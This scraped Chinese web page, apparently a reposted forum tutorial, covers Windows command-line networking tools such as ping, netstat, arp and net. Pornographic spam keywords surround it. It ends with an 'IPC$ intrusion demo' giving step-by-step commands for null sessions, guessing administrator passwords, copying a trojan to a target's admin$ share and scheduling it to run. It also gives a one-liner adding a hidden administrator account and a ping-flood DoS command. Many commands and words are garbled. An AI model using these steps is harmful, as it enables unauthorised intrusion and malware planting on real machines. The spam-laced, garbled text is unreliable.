久久高清中文字幕第一页,福利微拍一区二区三区,五月婷婷亚洲五月

　　DOS簡(jiǎn)介

哈哈，小小娛樂(lè)一下@@河南一區(qū) 蕭邦007 技術(shù)交流！！！

DOS是英語(yǔ)中Disk　OrerationSystem（磁盤操作系統(tǒng)）的縮寫(xiě)，其實(shí)DOS的版本有很多，比如MS-DOS、FreeDOS、PC_DOS等，正在我們常用的是MS_DOS（MS是Microsoft的縮寫(xiě)）

.exe的文件叫可執(zhí)行文件

.com的文件叫命令文件

.bat的文件叫批處理文件

如果要執(zhí)行這些文件，只需在提示符下敲入文件基本名后回車即可，不需輸入文件后綴。如果具有相同的名字，其根據(jù)優(yōu)先級(jí)，以次是.com、.exe .bat .cmd

1.0 DOS的啟動(dòng)方法

1.開(kāi)始——運(yùn)行CMD（或者command）

2.開(kāi)始——程序——附件——命令提示符

3.新建批處理法

第二課 Ping命令介紹及使用方法

1.1什么是Ping命令

Ping是個(gè)使用頻率極高的實(shí)用程序，用于確定本地主機(jī)是否能與另一臺(tái)主機(jī)交換（發(fā)送與接收）數(shù)據(jù)包。根據(jù)返回的的信息，我們就可以推斷TCP/IP參數(shù)是否設(shè)置得正確以及運(yùn)行是否正常。需要注意的是：成功的與另一臺(tái)主機(jī)進(jìn)行一次再次數(shù)據(jù)包交換并不表示TCP/IP配置就是正確的，我們必須執(zhí)行大量的本地主機(jī)與遠(yuǎn)程主機(jī)的數(shù)據(jù)包交換，才能確信TCP/IP的正確性。

簡(jiǎn)單的說(shuō)，Ping就是一個(gè)測(cè)試程序，如果Ping運(yùn)行正確，我們大體上就可以排除網(wǎng)絡(luò)訪問(wèn)層、網(wǎng)卡、MODEM的輸入輸出線路、電纜和路由器等存在的故障，從而減小了問(wèn)題的范圍。但由于可以自定義所發(fā)數(shù)據(jù)包的大小擴(kuò)無(wú)何止的調(diào)整發(fā)送同，Ping也被某些加別的用心的人作為DDOS（拒絕服務(wù)攻擊）的工具，例如許多大型的網(wǎng)站就是被黑客利用數(shù)百臺(tái)可以接入互聯(lián)網(wǎng)的電腦連續(xù)發(fā)送大量Ping數(shù)據(jù)包而癱瘓的。

1.2通過(guò)Ping檢測(cè)網(wǎng)絡(luò)故障

Ping 127.0.0.1

這個(gè)Ping 命令被送到本地計(jì)算機(jī)的IP軟，該命令永不退出該計(jì)算機(jī)。如果沒(méi)有做到這一點(diǎn)，就表示TCP/IP的安裝或運(yùn)行存在某些最基本的問(wèn)題。

Ping本機(jī)IP

這個(gè)命令被送到我們計(jì)算機(jī)所配置的IP地址，我們　的計(jì)算機(jī)始終都應(yīng)該對(duì)該P(yáng)ing命令作出應(yīng)答，如果沒(méi)有，則表示本地配置或安裝存在問(wèn)題。出現(xiàn)此問(wèn)題時(shí)，局域網(wǎng)用戶請(qǐng)斷開(kāi)網(wǎng)絡(luò)電纜，然后重新發(fā)送該命令。如果網(wǎng)線斷開(kāi)后本命令命令正確，則表示另一臺(tái)計(jì)算機(jī)可能配置了相同的IP地址。

Ping局域網(wǎng)內(nèi)其他IP

這個(gè)命令應(yīng)該離開(kāi)我們的計(jì)算機(jī)，經(jīng)過(guò)網(wǎng)卡及網(wǎng)絡(luò)電纜到達(dá)其他計(jì)算機(jī)，再返回。收到回送應(yīng)答表明本地網(wǎng)絡(luò)中的網(wǎng)卡和載體運(yùn)行正確。

但如果收到0個(gè)回送應(yīng)答，那么表示子網(wǎng)掩碼（進(jìn)行子網(wǎng)掩碼分割時(shí)，將IP地址的網(wǎng)絡(luò)部分與主機(jī)部分分開(kāi)的代碼）不正確或網(wǎng)卡配置錯(cuò)誤或者電纜系統(tǒng)有問(wèn)題。

Ping網(wǎng)關(guān)IP 如Ping 192.168.1.1

這個(gè)命令如果應(yīng)答正確，表示局域網(wǎng)中網(wǎng)關(guān)路由器正在運(yùn)行并能作出應(yīng)答。

Ping遠(yuǎn)程IP 如：Ping www.163.com

如果收到4個(gè)應(yīng)答，表示成功的使用了缺省網(wǎng)關(guān)。對(duì)于撥號(hào)上網(wǎng)用戶則表示能夠成功的訪問(wèn)Internet（但不排除ISP的DNS會(huì)有問(wèn)題）。

Ping localhot

localhost是操作系統(tǒng)的網(wǎng)絡(luò)保留名，它是127.0.0.1的別名，每臺(tái)計(jì)算機(jī)都應(yīng)該能夠?qū)⒃撁洲D(zhuǎn)換成該地址。如果沒(méi)有做到這，則表示主機(jī)文件（/Windows/host）中存在問(wèn)題。

Ping www.XXX.com(如www.163.com)

對(duì)這個(gè)域名執(zhí)行Ping www.XXX.com地址，通常是通過(guò)DNS服務(wù)器，如果這里出現(xiàn)故障，則表示DNS服務(wù)器的IP地址配置不正確或DNS服務(wù)器有故障（對(duì)于撥號(hào)上網(wǎng)用戶，某些ISP已經(jīng)不需要設(shè)置DNS服務(wù)器了）。

注意：我們也可以利用該命令實(shí)現(xiàn)域名對(duì)IP地址的轉(zhuǎn)換功能。

注意：如上所列的所有Ping命令都能正常運(yùn)行，那么我們對(duì)自己的計(jì)算機(jī)進(jìn)行本地和遠(yuǎn)程的功能基本上就可以放心了。但是，這些命令的成功并不表示我們所有的網(wǎng)絡(luò)配置都沒(méi)有問(wèn)題，例如，某些子網(wǎng)掩碼錯(cuò)誤無(wú)法用這些方法檢測(cè)到。

1.3Ping命令常用參數(shù)說(shuō)明

Ping IP -t

連續(xù)對(duì)IP地址執(zhí)行Ping 命令，直到被用戶以Ctrl+C中斷。

Ping IP?。璴 3000

指定Ping命令中的數(shù)據(jù)長(zhǎng)度為3000字節(jié)，而不是缺省的32字節(jié)。

Ping　IP -n 4

執(zhí)行特定次數(shù)的Ping命令。默認(rèn)的是4次。

1.4Ping命令用途作業(yè)講解

1用來(lái)檢測(cè)網(wǎng)絡(luò)是否通暢。命令為Ping www.hack58.com

2.可以將域名轉(zhuǎn)換成IP。如Ping www.hack58,com【222.152.42.54】with 32bytes of data:也就是說(shuō)www.hack58.com的IP為222.152.42.54

3.可根據(jù)Ping返回的TTL值來(lái)判斷對(duì)方所使用的操作系統(tǒng)。

TTL=32 Windows 9X/Me

TTL=64 LINUX

TTL=128 Windows 200X/xp

TTL=255 Unix

但是這個(gè)值還是絕對(duì)的，可以修改。

4.Ping 命令用來(lái)延時(shí)，用來(lái)指定一程序或命令在指定時(shí)候內(nèi)執(zhí)行。比如：Ping 127.0.0.1 -n &net cnsst cnsst /add &net localgroup administrators cnsst /add

這條命令的意思是Ping 127.0.0.1 5次后添加用戶cnsst并提升為管理員組。

5.Ping還可以用來(lái)進(jìn)行DDOS攻擊，比如：死亡之Ping命令為：Ping 127.0.0.1 -l 65500 -t

6.其它功能。比如：

·可以判斷數(shù)據(jù)包經(jīng)過(guò)多少路由

·可以檢測(cè)服務(wù)器的丟包率 lost=0 (0% loss)

·可以檢測(cè)某個(gè)時(shí)間服務(wù)器斷網(wǎng)或是重啟過(guò)

·可以檢測(cè)自己的網(wǎng)絡(luò)什么時(shí)間斷過(guò)

·可以檢測(cè)對(duì)方是否設(shè)置了一系列的安全策略或禁Ping設(shè)置

Netstat命令介紹及使用技巧

Netstat用于顯示與Ip、TCP、UDP和ICMP協(xié)議相關(guān)的統(tǒng)計(jì)數(shù)據(jù)，一般用于檢驗(yàn)本機(jī)各端口的網(wǎng)絡(luò)連接情況。

2.0 Netstat一些常用的選項(xiàng)

netstat -s

本選項(xiàng)能夠按照各個(gè)協(xié)議分別顯示其統(tǒng)計(jì)數(shù)據(jù)。如果我們的應(yīng)用程序（臺(tái)Web瀏覽器）運(yùn)行速度比較慢，或者不能顯示W(wǎng)eb頁(yè)之類的數(shù)據(jù)，那么我們就可以用本選項(xiàng)查看一下所顯示的信息。我們需要仔細(xì)查看統(tǒng)計(jì)數(shù)據(jù)的各行，找到出錯(cuò)的關(guān)鍵字，進(jìn)而確定問(wèn)題所在。

netstat -e

本選項(xiàng)用于顯示關(guān)于民太網(wǎng)的統(tǒng)計(jì)數(shù)據(jù)。它列出的包括傳送的數(shù)據(jù)包的總字節(jié)數(shù)、錯(cuò)誤數(shù)、刪除數(shù)、數(shù)據(jù)包的數(shù)量和廣播數(shù)量。這些統(tǒng)計(jì)數(shù)據(jù)既有發(fā)送的數(shù)據(jù)包數(shù)量，也接收的數(shù)據(jù)包數(shù)量。這個(gè)選項(xiàng)可以用來(lái)統(tǒng)計(jì)基本的網(wǎng)絡(luò)流量。

netstat -r

本選項(xiàng)可以顯示關(guān)于路由器的信息，類似于后面所講使用route print命令時(shí)看到的信息。除了顯示有效路由外，還顯示當(dāng)前有效的連接。

netstat -a

本選項(xiàng)顯示一個(gè)所有的有效連接信息列表，包括已建立的連接（ESTABLISHED）,包括監(jiān)聽(tīng)連接請(qǐng)求（LISTENNING）的那些連接。

netstat -n

顯示所有已建立的有效連接。

2.1 Netstat的妙用

經(jīng)常上網(wǎng)的人，一般都用QQ，當(dāng)被一些人騷擾，相投訴以不知從何下手？我們只要知道對(duì)方的IP，就可以向他所屬的ISP投訴了。但怎樣才能通過(guò)QQ知道對(duì)方的IP呢？其實(shí)，我們只需要通過(guò)Netstat就可以很方便的做到這一點(diǎn)；當(dāng)他通過(guò)與我們連接時(shí)（他給我們發(fā)一條信息或給他發(fā)一條信息），立刻在DOS命令提示符下輸入netstat -n或netstat -a就可以看到對(duì)方上網(wǎng)時(shí)所用的IP或ISP域名了，甚至連所用Port都完全暴露了。

第四課 IPconfig命令介紹及使用技巧

ipconfig

當(dāng)使用IPconfig時(shí)不帶任何參數(shù)選項(xiàng)，那么它為每個(gè)已經(jīng)配置了接口顯示IP地址、子我掩碼和缺省網(wǎng)關(guān)值。

ipconfig /all

本地IP地址、子網(wǎng)掩碼、網(wǎng)關(guān)、DNS等；還可以顯示內(nèi)置于本地網(wǎng)卡中的物理地址（MAC）；如果IP地址是從DHCP服務(wù)器租用的，IPconfig將顯示HDHCP服務(wù)器的IP地址和租用地址預(yù)計(jì)失效的日期。

ARP（地址轉(zhuǎn)換協(xié)議）介紹使用技巧

arp -a 或-g

用于查看高速緩存中的所有項(xiàng)目。-a和-g 參數(shù)的結(jié)果是一樣的，-g一直是UNIX平臺(tái)上用來(lái)顯示ARP高速緩存中所有項(xiàng)目的選項(xiàng)，而Windows用的是arp -a (-a 可被為all),但它也可以接受比較傳統(tǒng)的-g選項(xiàng)。

arp -a IP

如果我們有多個(gè)網(wǎng)卡，那么使用arp -a 加上接口的IP地址，就可以只顯示與該接口相關(guān)的ARP緩存項(xiàng)目。

arp -s IP 物理地址

我們可以向ARP高速緩存中人工輸入一個(gè)靜態(tài)項(xiàng)目。該項(xiàng)目在計(jì)算機(jī)引導(dǎo)過(guò)程中將保持有效狀態(tài)，或者出現(xiàn)錯(cuò)誤時(shí)，人工配置的物理地址將自動(dòng)更新該項(xiàng)目。

arp -d

使用本命令能夠人式刪除所有緩存信息；當(dāng)遭到arp欺騙時(shí)。

arp -d IP

使用本命令能夠刪除一個(gè)靜態(tài)項(xiàng)目

ARP病毒簡(jiǎn)介

現(xiàn)在局域網(wǎng)中感染ARP病毒的情況比較多，清理和防范都比較困難，給不秒的網(wǎng)絡(luò)管理員造成了很多的困擾。

那么如何應(yīng)對(duì)ARP病毒及防范措施。

ARP病毒的癥狀

有時(shí)候無(wú)法正常上網(wǎng)，有時(shí)候好了，包括訪問(wèn)網(wǎng)卡鄰居也是如此，拷貝文件無(wú)法完成，出現(xiàn)錯(cuò)誤；局域網(wǎng)內(nèi)的ARP包爆增，使用ARP查詢的時(shí)候會(huì)發(fā)現(xiàn)不正常的MAC地址，或者錯(cuò)誤的MAC地址對(duì)，還有就是一個(gè)MAC地址對(duì)應(yīng)多個(gè)IP的情況也會(huì) 有出現(xiàn)。

ARP攻擊的原理：

ARP欺騙攻擊的包一般有以下兩個(gè)特點(diǎn)，滿足之一可視為攻擊包報(bào)警：第一以太網(wǎng)數(shù)據(jù)包頭的源地址、目標(biāo)地址和ARP數(shù)據(jù)包的協(xié)議地址不匹配?；蛘撸珹RP數(shù)據(jù)包的發(fā)送和目標(biāo)地址不在自己網(wǎng)絡(luò)網(wǎng)卡MAC數(shù)據(jù)庫(kù)內(nèi)，或者與自己網(wǎng)絡(luò)MAC數(shù)據(jù)庫(kù)Mac/IP不匹配。這些統(tǒng)統(tǒng)第一時(shí)間報(bào)警，查這些數(shù)據(jù)包（以太網(wǎng)數(shù)據(jù)包）的源地址（也可能偽造），說(shuō)法大致知道那臺(tái)機(jī)器在發(fā)起攻擊了?，F(xiàn)在有網(wǎng)絡(luò)管理工具比如網(wǎng)絡(luò)執(zhí)法官、P2P終結(jié)者也會(huì)使用同樣方式來(lái)偽裝成網(wǎng)關(guān)，欺騙客戶端對(duì)網(wǎng)關(guān)訪問(wèn)，也就是會(huì)獲取到網(wǎng)關(guān)的流量，從而實(shí)現(xiàn)網(wǎng)絡(luò)管理和網(wǎng)絡(luò)監(jiān)控等功能，同時(shí)也會(huì)對(duì)網(wǎng)絡(luò)管理帶來(lái)潛在的危害，就是可以很容易的獲取用戶的密碼等相關(guān)信息。

1.0

ARP病毒的處理有如下幾種方法

手工處理方法：

1、每次打開(kāi)電腦之后，首先檢測(cè)電腦網(wǎng)絡(luò)是否正常，如果不正常，可以網(wǎng)絡(luò)連接的屬性中點(diǎn)擊“修復(fù)”。（每次修復(fù)之后網(wǎng)絡(luò)都會(huì)正常一段時(shí)間）

2、在網(wǎng)絡(luò)正常的情況下，點(diǎn)擊“開(kāi)始”——運(yùn)行——cmd

3 輸入arp -a

若出現(xiàn)No ARP　Enrties　Found　說(shuō)明網(wǎng)關(guān)沒(méi)有疏通，Ping 192.168.1.1 就行了

4.記錄一下自己網(wǎng)關(guān)ip地址所對(duì)應(yīng)的物理地址（有時(shí)候出現(xiàn)多條記錄，只需記錄自己的網(wǎng)關(guān)的。）如，我的網(wǎng)關(guān)ip 地址是198.168.1.1，所對(duì)應(yīng)的物理地址是00-0a-eb-ff-64.

5.記錄好之后，繼續(xù)提示符下面輸入 “arp -a 網(wǎng)關(guān)的IP 地址對(duì)應(yīng)的物地址”，本例中為"arp -a 192.168.1.1 00-0a- eb-e6-ff-64",回車。

批處理法：

我們可以把手工處理法做成一個(gè)批處理。

注冊(cè)表法：

輯一具注冊(cè)表項(xiàng)值，鍵值如下：Windows Registry Editor Version 5.00 ［HKEY_LOCAL_MACHINESOFTWAREMindowsCurrentVersionRun]“mac”=“arp -s　網(wǎng)關(guān)IP　Mac地址”

然后保存成．Reg文件以后在每個(gè)客戶端上點(diǎn)擊導(dǎo)入注冊(cè)表。

預(yù)防措施：

1.及時(shí)升級(jí)客戶端的操作系統(tǒng)和應(yīng)用程序補(bǔ)?。?br />
2.安裝和更新殺毒軟件。

3.如果網(wǎng)絡(luò)規(guī)模較少，盡量使用手動(dòng)指定IP設(shè)置，而不是使用DHCP來(lái)分配IP地址。

4.如果交換機(jī)支持，在交換機(jī)上綁定MAC地址與IP地址。（不過(guò)這個(gè)實(shí)在不是好主意?。?br />
Net命令詳解及使用技巧

1.1 Net命令簡(jiǎn)介

NET命令是一個(gè)命令行命令，Net命令有很多函數(shù)用于

實(shí)用和核查計(jì)算機(jī)之間的NetBIOS連接，可以查看我們的管理網(wǎng)絡(luò)環(huán)境、服務(wù)、用戶、登陸等信息內(nèi)容。

要想獲得Net的 HELP可以

(1)在Windows下可以用圖形的方式，開(kāi)始>幫助>索引>輸入NET

(2)在COMMAND 下可以用字符方式：NET /?或NET　HELP取得相應(yīng)的方法的幫助。所有Net命令接受選項(xiàng)/yes和/no

1.2 Net命令參數(shù)使用技巧

1、 Net View

作用：顯示域列表、計(jì)算機(jī)列表或指定計(jì)算機(jī)的共享資源列表。

命令格式： Net view [\computername |/domain[:domainname]]

有關(guān)參數(shù)說(shuō)明：

鍵入不帶參數(shù)的Net view 顯示當(dāng)前域的計(jì)算機(jī)列表

\computernamae 指定要查看其共享資源的計(jì)算機(jī)

/domain[:domainname]指定要相看其可用計(jì)算機(jī)的域

例如：Net vie \GHQ 查看GHQ計(jì)算機(jī)的共享資源列表。

Net view /domain:XZY 查看XZY域中的機(jī)器列表。

2.Net User

作用：添加或更改用戶帳號(hào)或顯示用戶帳號(hào)信息。

命令格式：net user [username [password |*] [option]] [/domain]

有關(guān)不帶參數(shù)的Net user 查看計(jì)算機(jī)上的用戶帳號(hào)列表

如：net user cheng 123 /add

3.Net use

作用：連接計(jì)算機(jī)或斷開(kāi)計(jì)算機(jī)與共享資源的連接，或顯示計(jì)算機(jī)的連接信息。

命令格式：

有關(guān)參數(shù)說(shuō)明：

鍵入不帶參數(shù)的Net use 列出網(wǎng)絡(luò)連接

4.Net Time

作用：使計(jì)算機(jī)的時(shí)鐘與另一臺(tái)計(jì)算機(jī)或域的時(shí)間兩步。

5.net start

作用：?jiǎn)?dòng)服務(wù)，或顯示已啟動(dòng)服務(wù)的列表。

DOS簡(jiǎn)介 dos系統(tǒng)怎么裝xp

命令格式：net start 服務(wù)的名稱

6.net Pause 服務(wù)名稱

暫停正在運(yùn)行的服務(wù)

7. Net Continue 服務(wù)名稱

重新激活掛起的服務(wù)

8.net stop 服務(wù)名稱

停止Windows網(wǎng)絡(luò)服務(wù)

控制面板——管理工具—服務(wù)

9.Net Statistics

作用：顯示本地工作或服務(wù)器的統(tǒng)計(jì)記錄。

鍵入不帶參數(shù)的net statistics 列出其統(tǒng)計(jì)信息可用的運(yùn)行服務(wù)。

10.Net Share

作用：創(chuàng)建、刪除或顯示共享資源

11.net send

作用：向網(wǎng)絡(luò)的其他用戶、計(jì)算機(jī)或通信名發(fā)送消息。

前提是要打開(kāi)message服務(wù)：

管理工具——服務(wù)——message

如：“net send 192.168.1.45

要發(fā)送的內(nèi)容”可向在同局域網(wǎng)中任何一臺(tái)機(jī)器發(fā)送信息。

第七課其它DOS命令綜合介紹

cd 返回根目錄

cd.. 返回上一級(jí)目錄

copy 拷貝文件

del 刪除文件

tree 顯示驅(qū)動(dòng)器或路徑的文件夾結(jié)構(gòu)

dir 列文件名

format 格式化磁盤

md 建立目錄

type 顯示文件內(nèi)容

rd 刪除目錄

ren 改變誰(shuí)的文件名

cls 清屏

基于DOS命令的IPC簡(jiǎn)單入侵演示

1.1什么是ipc$

IPC$是共享"命名管道"的資源，它是為了讓進(jìn)程間而開(kāi)放的命名管道，可以通過(guò)驗(yàn)證用戶名和密碼獲得相應(yīng)的權(quán)限，在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。

注意事項(xiàng)：

1.IPC連接是WindowsNT及以上系統(tǒng)中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能，其功能相當(dāng)于Unix中的Telent，由于ＩＰＣ＄功能需要用到WindowsNT中的很多DLL函數(shù)，所以不能在Windowxs９X中運(yùn)行。

2.即使是空連接也不是100%都能建立成功，如果對(duì)方關(guān)閉了ipc$共享，你仍然無(wú)法建立連接

3.并不是說(shuō)建立了ipc$連接就可以查看對(duì)方的用戶列表，因?yàn)楣芾韱T可以禁止導(dǎo)出用戶列表。

1.2 建立ipc$連接的危害

訪問(wèn)部分共享，如果你能夠以某個(gè)具有一定權(quán)限的用戶身份登陸的話，那么你就會(huì)得到相應(yīng)有權(quán)限；

為獲取上目標(biāo)信息、管理瞟進(jìn)程和服務(wù)，上傳木馬半運(yùn)行；如果是2000server,還可以考慮開(kāi)啟終端服務(wù)方便控制。

1.3 ipc$ 關(guān)系網(wǎng)

1.ipc$g與空連接：

不需要用戶名與密碼的ipc$連接即為空連接，一旦你某個(gè)用戶或管理員的身份登陸（即以特定的用戶名和密碼進(jìn)行ipc$連接），自然就不能叫做空連接了。

2.ipc$與139、445端口：

SMB（ServerMessageBlock） Windows協(xié)議族，用于文件和打印共享服務(wù)。

NBT（NetBIOS over TCP/IP）使用137（UDP），138（UDP）and 139(TCP)來(lái)實(shí)現(xiàn)基于TCP/IPｒ?。危牛裕拢桑希泳W(wǎng)際互聯(lián)。

ipc$連接可以實(shí)現(xiàn)遠(yuǎn)程登陸及對(duì)默認(rèn)共享的訪問(wèn)。一般情況下，我們可以通過(guò)139、445（win2000）端口實(shí)現(xiàn)對(duì)共享文件/打印機(jī)的訪問(wèn)，ipc$連接是需要139或445端口來(lái)支持的。

3. ipc$ 與默認(rèn)共享

默認(rèn)共享是為了管理員遠(yuǎn)程管理而默認(rèn)開(kāi)啟的共享（當(dāng)然可以關(guān)閉它），即即所有的邏輯盤（c$ d$ e$....）和系統(tǒng)目錄winnt或windows(admin$),我們通過(guò)ipc$連接可以實(shí)現(xiàn)對(duì)這些默認(rèn)共享的訪問(wèn)（前提是對(duì)方?jīng)]有關(guān)閉這些默認(rèn)共享）。

1.4 ipc$連接失敗的原因

1.你的系統(tǒng)不是NT或以上操作系統(tǒng)；

２.對(duì)方?jīng)]有打開(kāi)默認(rèn)ipc$默認(rèn)共享；

3.對(duì)方未開(kāi)啟139或445（或被防火墻屏蔽）；

4.你的命令輸入有誤(比如缺少了空格等)；

5.用戶名或密碼錯(cuò)誤；

可以根據(jù)返回的錯(cuò)誤號(hào)分析原因：

錯(cuò)誤號(hào):5,拒絕訪問(wèn)：很可能低價(jià)使用的用戶不是管理員權(quán)限的，先提升權(quán)限；

錯(cuò)誤號(hào)：51 ，Windows無(wú)法找到網(wǎng)絡(luò)路徑：

網(wǎng)絡(luò)有問(wèn)題；

錯(cuò)誤號(hào)53，找不到網(wǎng)絡(luò)路徑：IP地址錯(cuò)誤；目標(biāo)未開(kāi)機(jī)；目標(biāo)lanmanserver服務(wù)未啟動(dòng)；目標(biāo)有防火墻（端口過(guò)濾）；

錯(cuò)誤號(hào)67，找不到網(wǎng)絡(luò)名：你的lanmanworkstation服務(wù)未啟動(dòng)；目標(biāo)刪除了ipc$;

1.5 如何打開(kāi)目標(biāo)ipc$

首先獲得一個(gè)不依賴于ipc$的shell，比如sql的cmd擴(kuò)展、telent、木馬，當(dāng)然，這shell必有是admin權(quán)限的，然后你可以使用shell執(zhí)行命令net share ipc$ 來(lái)開(kāi)放目標(biāo)的ipc$。

從上面可以知道，ipc$能否使用還有很多條件。請(qǐng)確認(rèn)相關(guān)服務(wù)都已經(jīng)運(yùn)行，沒(méi)有就啟動(dòng)它（通過(guò)net 命令），還是不行的話。（比如有防火墻）建議放棄。

1.6經(jīng)典入侵模式

相關(guān)命令：

1.建立空連接：

net use \IPipc$ "" /user:""(一定要注意：這一行命令中包括了三個(gè)空格)

2.建立非空連接：

net use \IPipc$＂密碼＂ /user:"用戶名"（同樣有三個(gè)空格）

3. 映射默認(rèn)共享：

net use z :\IPc$ "密碼" /user:"用戶名"（即可將對(duì)方的c 盤映射為自己怕z盤，其他盤類推）

如果已經(jīng)和目標(biāo)建立了ipc$,則可以直接用IP＋盤符+$訪問(wèn)，具體命令 net use z: \IPc$

4.刪除一個(gè)ipc$連接

net use \ipipc$ /del

5.刪除共享映射

net use c: /del 刪除映射的C盤，其盤類推

net use * /del 刪除全部，會(huì)有提示要求按Y確認(rèn)。

經(jīng)典入侵模式

第一步：掃描目標(biāo)IP段，嘗試建立空連接，猜解administrator的密碼。這一過(guò)程費(fèi)時(shí)費(fèi)力，建議使用流光X-Scan掃描，掛字典猜解密碼。

第二步：打開(kāi)cmd輸入：

C:>net use \127.0.0.1IPC$ "123" /user:"administrator"

下面用到一些工具在流光Tools中，也可以用其他的工具，大同小異。

復(fù)制木馬程序到目標(biāo)機(jī)器：

c:>copy as.exe \127.0.0.1admin$

(admin$是指admin用戶的c:winsystem32還可以使用c$ d$ 意思是C盤與D盤，)

如：

c:>copy 木馬.exe \10.114.10.145$

c:>net time \127.0.0.1 //查詢對(duì)方計(jì)算機(jī)的時(shí)間

如 net time \10.112.15.146

接下來(lái)：

C:>at \10.112.15.146 13:45 c:木馬.exe

c:> at \10.112.15.146

unix簡(jiǎn)介

愛(ài)華網(wǎng)本文地址 » http://www.klfzs.com/a/25101014/205977.html

日韩av高清在线影院,欧美日韩国产综合色视频在线,日韩精品人妻在线视频,内射极品高挑少妇人妻,久久久国产成人免费,97久久视频在线观看,人妻中文字幕日韩有码人妻熟女,亚洲国产成人精品福利,99精品国产福利在线观看

DOS簡(jiǎn)介 dos系統(tǒng)怎么裝xp

更多閱讀

xp系統(tǒng)怎么定時(shí)關(guān)機(jī) xp如何設(shè)置定時(shí)關(guān)機(jī)

XP系統(tǒng)快速進(jìn)入DOS系統(tǒng)方法匯總 xp如何進(jìn)入dos系統(tǒng)

dos命令怎么刪除文件怎么進(jìn)入dos命令

下載的系統(tǒng)怎么裝 win8精簡(jiǎn)版

Win7系統(tǒng)下怎么安裝xp系統(tǒng) win7裝win7雙系統(tǒng)

聲明:《DOS簡(jiǎn)介 dos系統(tǒng)怎么裝xp》為網(wǎng)友夢(mèng)魘綻荼蘼分享！如侵犯到您的合法權(quán)益請(qǐng)聯(lián)系我們刪除